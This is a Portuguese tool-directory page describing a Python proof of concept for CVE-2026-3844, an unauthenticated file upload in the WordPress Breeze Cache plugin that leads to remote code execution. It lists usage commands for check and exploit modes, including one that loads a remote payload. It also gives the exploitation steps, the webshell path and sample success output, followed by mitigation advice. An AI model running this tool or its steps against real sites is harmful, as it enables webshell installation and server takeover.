Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/sahmsec/cve-2026-3844
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubsahmsec/cve-2026-3844

CVE-2026-3844

Prova de conceito em Python para CVE-2026-3844, um upload arbitrário de arquivos não autenticado no plugin WordPress Breeze Cache, permitindo execução remota de código. Inclui detecção, exploração e verificação de webshell.

Ver Repositório
5há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-3844 — WordPress Breeze Cache Upload de Arquivo Não Autenticado

Visão Geral

Este repositório contém um script de prova de conceito (PoC) em Python para demonstrar uma vulnerabilidade de Upload Arbitrário de Arquivo Não Autenticado que afeta o plugin WordPress Breeze Cache <= 2.4.4.

⚠️ Este projeto destina-se estritamente a testes de segurança autorizados, pesquisa educacional e validação defensiva.


Informações da Vulnerabilidade

  • ID CVE: CVE-2026-3844
  • Plugin Afetado: Breeze Cache para WordPress
  • Versões Afetadas: <= 2.4.4
  • Tipo de Problema: Upload Arbitrário de Arquivo Não Autenticado
  • Impacto: Potencial Execução Remota de Código (RCE)
  • Vetor de Ataque: Remoto / Não Autenticado

A vulnerabilidade abusa da funcionalidade de cache de gravatar do Breeze Cache para armazenar arquivos controlados pelo atacante dentro do diretório de cache do WordPress.


Recursos

  • Modo de detecção de vulnerabilidade
  • Fluxo de exploração automatizado
  • Suporte à verificação de webshell
  • Saída de terminal colorida
  • Carregamento remoto de payload
  • Verificações de upload
  • Registro de saída opcional

  • Requisitos

    • Python 3.8+
    • pycurl
    • termcolor

    Instale as dependências:

    root@kitploit:~
    pip install pycurl termcolor
    

    Arquivos

    ArquivoDescrição
    CVE-2026-3844.pyScript principal do PoC
    CVE-2026-3844.yamlTemplate/configuração YAML

    Uso

    Verificar se o Alvo Parece Vulnerável

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com --check-only
    

    Executar Exploit

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com
    

    Payload Personalizado

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
    

    Salvar Resultados

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com -o results.txt
    

    Como Funciona

    O script executa as seguintes etapas:

    1. Detecta a versão instalada do Breeze Cache
    2. Verifica se a versão do plugin é vulnerável
    3. Envia uma solicitação de comentário WordPress manipulada
    4. Abusa do tratamento de gravatar do cache Breeze
    5. Aguarda a geração do cache
    6. Verifica se o arquivo enviado se torna acessível
    7. Testa a capacidade de resposta do payload

    Caminho Vulnerável

    O payload enviado pode se tornar acessível a partir de:

    root@kitploit:~
    /wp-content/cache/breeze-extra/gravatars/
    

    Observações

    A exploração bem-sucedida pode depender da seguinte configuração do Breeze estar habilitada:

    root@kitploit:~
    Host Files Locally - Gravatars
    

    Se o recurso estiver desabilitado, as tentativas de exploração podem falhar.


    Exemplo de Saída

    root@kitploit:~
    [+] Target VULNERABLE (Breeze v2.4.4)
    [+] Comment posted successfully
    [+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
    [+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
    

    Aviso Legal

    Este repositório é fornecido para:

    • Pesquisa de segurança
    • Fins educacionais
    • Testes de penetração autorizados
    • Avaliações de segurança defensiva

    Não use este projeto contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.

    O autor não assume responsabilidade por uso indevido ou danos causados por este projeto.


    Recomendações de Mitigação

    Administradores de sites devem:

    • Atualizar o Breeze Cache para a versão corrigida mais recente
    • Desabilitar recursos desnecessários de cache de arquivos
    • Restringir uploads de arquivos perigosos
    • Desabilitar a execução de PHP dentro de diretórios de cache
    • Monitorar /wp-content/cache/ em busca de arquivos suspeitos
    • Implantar um Web Application Firewall (WAF)
    • Aplicar validação rigorosa no lado do servidor

    Declaração de Propósito Educacional

    Esta prova de conceito foi criada para ajudar:

    • Pesquisadores de segurança
    • Testadores de penetração
    • Equipes azuis
    • Administradores WordPress
    • Desenvolvedores

    a entender os riscos de segurança associados a mecanismos de cache inseguros e uploads arbitrários de arquivos.


    Referências

    • Banco de Dados CVE
    • Avisos de Segurança do WordPress
    • Diretrizes de Segurança de Upload de Arquivos da OWASP
    • Documentação do Plugin Breeze Cache

    Autor

    Projeto Educacional / Pesquisa de Segurança

    Baixar ferramenta